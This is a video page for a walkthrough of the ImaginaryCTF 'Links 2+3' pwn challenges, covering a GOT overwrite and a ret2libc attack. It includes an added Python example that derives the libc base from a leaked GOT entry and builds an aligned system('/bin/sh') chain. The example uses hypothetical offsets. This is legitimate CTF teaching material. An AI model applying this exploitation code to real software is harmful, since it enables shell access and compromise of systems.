
Linked List Exploit Continued - GOT Overwrite - "Links 2+3" Pwn Challenge [ImaginaryCTF] 

CryptoCat

"Links 2" (Pwn) challenge from ImaginaryCTF (iCTF), 27/06/22: "It turns out that there was a bug in how I was handling writing some elements, so I've fixed that. Also, I've stopped putting the flag in a global variable, because that's probably not a good idea. Double check my implementation one more time for me?" In this challenge we use Ghidra, GDB (pwndbg) and pwntools to exploit a vulnerable custom linked-list implementation by overwriting a Global Offset Table (GOT) entry so that it points to system(), which gets us a shell.
"Links 3" (Pwn) challenge from ImaginaryCTF (iCTF), 30/06/22: "And now you guys are exploiting my View Time feature that I put there solely for your convenience? Fine, then - no more time for you!" This challenge removes the view_time() function, and with it the binary's own call to system(), so we can no longer read system()'s address out of the GOT. However, we can still leak the GOT entry of any other imported function and use a libc database (libc.rip, libc.blukat.me) to identify the remote libc build and recover the offsets we need for a ret2libc attack. Hope you enjoy 🙂 #CTF #iCTF #ImaginaryCTF #Pwn #BinaryExploitation
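The two steps the description glosses over in the Links 3 approach are (a) turning one leaked GOT entry into the libc base, with the low-12-bit check that the libc databases themselves rely on, and (b) building the final system("/bin/sh") chain so that the stack is 16-byte aligned when system() is entered. The block below is an added example of both, written for this page; it is not CryptoCat's solve script and not the challenge's code. It uses the Python standard library instead of pwntools, a hypothetical libc build with made-up symbol offsets (LIBC_SYMBOLS), and made-up gadget addresses; for a real target the offsets come from the build that libc.rip / libc.blukat.me matches to your leak.

```python
import struct

# Constructed symbol offsets for a HYPOTHETICAL libc build, present only so the
# example runs offline. For a real target, paste the leaked address into
# libc.rip or libc.blukat.me, pick the matching build, and copy its offsets.
LIBC_SYMBOLS = {
    "puts": 0x80ED0,
    "system": 0x50D70,
    "str_bin_sh": 0x1D8678,  # offset of the "/bin/sh" string inside libc
}


def p64(value: int) -> bytes:
    """Pack an 8-byte little-endian value (what pwntools' p64() does)."""
    return struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)


def u64(data: bytes) -> int:
    """Unpack up to 8 little-endian bytes, zero-padding short input."""
    if len(data) > 8:
        raise ValueError("more than 8 bytes")
    return struct.unpack("<Q", data.ljust(8, b"\x00"))[0]


def parse_got_leak(raw: bytes) -> int:
    """Convert the bytes read back from a GOT entry into an address.

    Userland x86-64 addresses have their top two bytes zero, so a pointer
    printed with puts() (or any %s-style read) stops at the first NUL and
    arrives as at most 6 bytes, usually followed by the newline puts() appends.
    """
    raw = raw.rstrip(b"\n")
    if not 1 <= len(raw) <= 8:
        raise ValueError(f"unexpected leak length {len(raw)}")
    return u64(raw)


def libc_base(leak: int, symbol: str) -> int:
    """Derive the libc load base from one leaked GOT entry.

    ASLR only randomises the page-aligned load address, so the low 12 bits of
    the leaked pointer must equal the low 12 bits of the symbol's offset in the
    libc build; that is exactly what libc.rip / libc.blukat.me match on. A
    mismatch means the offsets belong to a different build and every address
    computed from them would be wrong.
    """
    offset = LIBC_SYMBOLS[symbol]
    if (leak & 0xFFF) != (offset & 0xFFF):
        raise ValueError(
            f"low 12 bits of leak ({leak & 0xFFF:#05x}) != low 12 bits of "
            f"{symbol} offset ({offset & 0xFFF:#05x}); wrong libc build?"
        )
    return leak - offset


def resolve(base: int, symbol: str) -> int:
    """Absolute address of a libc symbol once the base is known."""
    return base + LIBC_SYMBOLS[symbol]


def ret2libc_chain(base: int, pop_rdi_ret: int, ret: int, rsp_mod_16_at_ret: int) -> bytes:
    """Build the chain system("/bin/sh") with correct stack alignment.

    The SysV ABI has rsp % 16 == 8 on entry to a function (it was 16-byte
    aligned before CALL pushed the return address), and glibc's system() relies
    on that for 16-byte SSE stores (the movaps crash seen in the video). We
    reach system() through RET rather than CALL, so we must fix alignment.

    Let R be rsp when the hijacked RET executes (pointing at the first chain
    qword); every qword consumed by a ret or pop raises rsp by 8. With
    [pop rdi; ret][&"/bin/sh"][system] the entry rsp is R + 24, which is
    8 mod 16 only when R is 0 mod 16. When R is 8 mod 16 (the usual case when
    returning out of a function with a normal prologue/epilogue), prepend a
    lone `ret` gadget to burn 8 bytes.

    pop_rdi_ret and ret are gadget addresses inside the target binary; the
    values used in the test are made up.
    """
    if rsp_mod_16_at_ret not in (0, 8):
        raise ValueError("rsp is always 8-byte aligned at a ret")
    chain = b""
    if rsp_mod_16_at_ret == 8:
        chain += p64(ret)  # alignment padding: one extra ret
    chain += p64(pop_rdi_ret)
    chain += p64(resolve(base, "str_bin_sh"))  # rdi = "/bin/sh"
    chain += p64(resolve(base, "system"))
    return chain
```

In pwntools terms, libc_base() is the `libc.address = leak - libc.sym.puts` line, and the low-12-bit check is the sanity test worth running before sending anything: if it fails, the database picked the wrong build. The alignment parameter is easiest to read off in pwndbg by breaking on the vulnerable function's `ret` and looking at `$rsp & 0xf`.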
Write-ups: github.com/Crypto-Cat/CTF/tre...
↢Social Media↣
Twitter: / _cryptocat
GitHub: github.com/Crypto-Cat
HackTheBox: app.hackthebox.eu/profile/11897
LinkedIn: / cryptocat
Reddit: / _cryptocat23
RU-vid: / cryptocat23
Twitch: / cryptocat23
↢ImaginaryCTF↣
imaginaryctf.org
/ imaginaryctf
/ discord
↢Video-Specific Resources↣
libc.blukat.me
libc.rip
↢Resources↣
Ghidra: ghidra-sre.org/CheatSheet.html
Volatility: github.com/volatilityfoundati...
PwnTools: github.com/Gallopsled/pwntool...
CyberChef: gchq.github.io/CyberChef
DCode: www.dcode.fr/en
HackTricks: book.hacktricks.xyz/pentestin...
CTF Tools: github.com/apsdehal/awesome-ctf
Forensics: cugu.github.io/awesome-forensics
Decompile Code: www.decompiler.com
Run Code: tio.run
↢Chapters↣
Start: 0:00
Links 1 Recap: 0:30
Reviewing Heap Layout in GDB-PwnDbg: 3:25
Keeping the Heap intact: 7:45
Links 2 Attack Plan: 11:55
Overwriting the GOT: 16:48
Stack Alignment: 20:08
Solution (leak system): 23:27
Links 3 (leak another libc function): 28:08
Recap: 33:27
End: 34:29

Science

Published: 1 Jul 2024

Comments: 8
@_CryptoCat 2 years ago
Write-ups: github.com/Crypto-Cat/CTF/tree/main/ctf_events/ictf/pwn/links Added some corrections there as well, e.g. we could have used the plt.system address instead of got.system to get around the stack alignment issue, rather than leaking libc.
@coolestguy6757 2 years ago
yuhhhh return of the king 😈😈😈
@_CryptoCat 2 years ago
👊
@_hackwell 2 years ago
Learnt new things. Thanks a lot 🙏 Last time I tried to overwrite the GOT with partial RELRO I got segfault and my offsets were right. Had to find a pointer to another writable area inside the header. Dunno why...
@_CryptoCat 2 years ago
Thanks mate, I learnt some new things on these ones too! That's weird with the GOT overwrite, should normally work with partial-RELRO 🤔
@_hackwell 2 years ago
@_CryptoCat I might have done something the wrong way also 🤔 I need to investigate more, because weird things happened even though my exploit worked just fine locally and remotely. Each binexp is different and that's where the fun is 😁
@Omniscient2 1 year ago
hi bro, please help, why do I get this in evil-winrm: Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
@_CryptoCat 1 year ago
It's a problem with the OpenSSL version: forum.hackthebox.com/t/evil-winrm-error-on-connection-to-host/257342 You can update your OpenSSL library OR use this quick fix: forum.hackthebox.com/t/lab-access-openvpn-certificate-verify-failed/257102/2